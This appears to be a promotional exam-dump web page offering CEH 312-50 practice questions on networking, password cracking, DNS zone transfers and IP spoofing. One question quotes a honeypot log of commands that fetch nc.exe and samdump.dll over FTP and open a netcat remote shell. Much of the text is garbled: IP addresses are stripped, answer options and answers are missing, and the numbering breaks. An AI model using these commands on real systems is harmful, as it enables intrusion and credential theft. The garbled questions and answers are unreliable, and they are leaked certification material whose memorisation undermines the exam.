Top Virtual 312-50 resource Tips!

Accurate of 312-50 free practice questions materials and prep for EC-Council certification for consumer, Real Success Guaranteed with Updated 312-50 pdf dumps vce Materials. 100% PASS Ethical Hacking and Countermeasures (CEHv6) exam Today!


Free VCE & PDF File for EC-Council 312-50 Real Exam
(Full Version!)

Pass on Your First TRY 100% Money Back Guarantee Realistic Practice Exam Questions

Free Instant Download NEW 312-50 Exam Dumps (PDF & VCE):
Available on:

Q271. Which is the right sequence of packets sent during the initial TCP three way handshake? 





Answer: D

Explanation: A TCP connection always starts with a request for synchronization, a SYN, the reply to that would be another SYN together with a ACK to acknowledge that the last package was delivered successfully and the last part of the three way handshake should be only an ACK to acknowledge that the SYN reply was recived. 

Q272. You have performed the traceroute below and notice that hops 19 and 20 both show the same IP address. 

What can be inferred from this output? 

1 ( 0.724 ms 3.285 ms 0.613 ms 2 ( 12.169 ms 14.958 ms 13.416 ms 3 ( 13.948 ms 

( 16.743 ms 16.207 ms 4 ( 17.324 ms 12.933 ms 20.938 ms 

5 ( 12.439 ms 220.166 ms 204.170 ms 6 ( 16.177 ms 25.943 ms 14.104 ms 7 ( 14.227 ms 17.553 ms 15.415 ms 8 ( 17.063 ms 20.960 ms 19.512 ms 9 ( 20.334 ms 19.440 ms 17.938 ms 10 ( 27.526 ms 18.317 ms 21.202 ms 11 ( 21.411 ms 19.133 ms 18.830 ms 12 ( 21.203 ms 22.670 ms 20.11 ms 13 ( 30.929 ms 24.858 ms 23.108 ms 14 ( 38.894 ms 33.244 33.910 ms 15 ( 51.165 ms 49.935 ms 49.466 ms 16 ( 50.937 ms 49.005 ms 51.055 ms 17 117.ATM6-0.GW5.MIA1.ALTER.NET ( 51.897 ms 50.280 ms 53.647 ms 18 ( 51.921 ms 51.571 ms 56.855 ms 19 ( 52.191 ms 52.571 ms 56.855 ms 20 ( 53.561 ms 54.121 ms 58.333 ms 

A. An application proxy firewall 

B. A stateful inspection firewall 

C. A host based IDS 

D. A Honeypot 

Answer: B

Q273. In this type of Man-in-the-Middle attack, packets and authentication tokens are captured using a sniffer. Once the relevant information is extracted, the tokens are placed back on the network to gain access. 

A. Token Injection Replay attacks 

B. Shoulder surfing attack 

C. Rainbow and Hash generation attack 

D. Dumpster diving attack 

Answer: A

Q274. A POP3 client contacts the POP3 server: 

A. To send mail 

B. To receive mail 

C. to send and receive mail 

D. to get the address to send mail to 

E. initiate a UDP SMTP connection to read mail 


Explanation: POP is used to receive e-mail.SMTP is used to send e-mail. 

Q275. You have discovered that an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project. What can you do to solve this problem? 

A. Install a network-based IDS 

B. Reconfigure the firewall 

C. Conduct a needs analysis 

D. Enforce your security policy 


Explanation: The employee was unaware of security policy. 

Q276. What tool can crack Windows SMB passwords simply by listening to network traffic? 

Select the best answer. 

A. This is not possible 

B. Netbus 


D. L0phtcrack 



This is possible with a SMB packet capture module for L0phtcrack and a known weaknesses in the LM hash algorithm. 

Q277. File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers? 

A. Use disable-eXchange 

B. Use mod_negotiation 

C. Use Stop_Files 

D. Use Lib_exchanges 

Answer: B

Q278. While footprinting a network, what port/service should you look for to attempt a zone transfer? 

A. 53 UDP 

B. 53 TCP 

C. 25 UDP 

D. 25 TCP 

E. 161 UDP 

F. 22 TCP 

G. 60 TCP 


Explanation: IF TCP port 53 is detected, the opportunity to attempt a zone transfer is there. 

Q279. Johnny is a member of the hacking group orpheus1. He is currently working on breaking into the Department of Defense’s front end exchange server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. 

What tool would be best used to accomplish this? 

A. RainbowCrack 

B. SMBCrack 

C. SmurfCrack 

D. PSCrack 

Answer: A

Explanation: RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time precomputation is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables. 

Topic 14, SQL Injection 

380. The following excerpt is taken from a honeypot log that was hosted at Snort reported Unicode attacks from The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. 

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below: 

“cmd1.exe /c open >ftpcom” 

“cmd1.exe /c echo johna2k >>ftpcom” 

“cmd1.exe /c echo haxedj00 >>ftpcom” 

“cmd1.exe /c echo get nc.exe >>ftpcom” 

“cmd1.exe /c echo get samdump.dll >>ftpcom” 

“cmd1.exe /c echo quit >>ftpcom” 

“cmd1.exe /c ftp –s:ftpcom” 

“cmd1.exe /c nc –l –p 6969 e-cmd1.exe” 

What can you infer from the exploit given? 

A. It is a local exploit where the attacker logs in using username johna2k. 

B. There are two attackers on the system – johna2k and haxedj00. 

C. The attack is a remote exploit and the hacker downloads three files. 

D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port. 

Answer: C

Q280. Cyber Criminals have long employed the tactic of masking their true identity. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine, by "spoofing" the IP address of that machine. 

How would you detect IP spoofing? 

A. Check the IPID of the spoofed packet and compare it with TLC checksum. If the numbers match then it is spoofed packet 

B. Probe a SYN Scan on the claimed host and look for a response SYN/FIN packet, if the connection completes then it is a spoofed packet 

C. Turn on 'Enable Spoofed IP Detection' in Wireshark, you will see a flag tick if the packet is spoofed 

D. Sending a packet to the claimed host will result in a reply. If the TTL in the reply is not the same as the packet being checked then it is a spoofed packet 

Answer: D